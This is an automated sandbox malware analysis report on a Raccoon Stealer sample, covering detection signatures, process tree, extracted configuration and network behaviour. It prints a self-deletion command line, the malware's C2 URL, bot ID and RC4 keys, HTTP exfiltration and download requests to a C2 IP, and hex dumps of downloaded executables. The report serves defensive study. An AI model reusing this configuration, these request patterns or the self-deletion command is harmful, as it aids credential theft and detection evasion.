Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.14529.6378

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.14529.6378 (renamed file extension from 6378 to exe)
Analysis ID:	491833
MD5:	e283621cd5dea00d95791a88eecda925
SHA1:	c1fca8da67debe3d9d67cf6def926d81c8bb3350
SHA256:	2becdf23ad63dfcb341ee332fa50623f0cf5e4fa5f0c6c854cd4e59ce8be3ce6
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Machine Learning detection for sample

Self deletion via cmd delete

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.AIDetect.malware1.14529.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe' MD5: E283621CD5DEA00D95791A88EECDA925)

cmd.exe (PID: 6212 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5864 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack

Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Virustotal: Detection: 33%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	ReversingLabs: Detection: 37%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	1_2_0042A130
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,	1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,	1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,	1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	1_2_00429F5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,	1_2_00434A5F

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source:	Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source:	Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

1_2_0043EFDD

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49745 -> 185.138.164.150:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49745 -> 185.138.164.150:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://t.me/agrybirdsgamerept

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1405Host: 185.138.164.150

Source: Joe Sandbox View

IP Address: 149.154.167.99 149.154.167.99

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:24 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:28 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 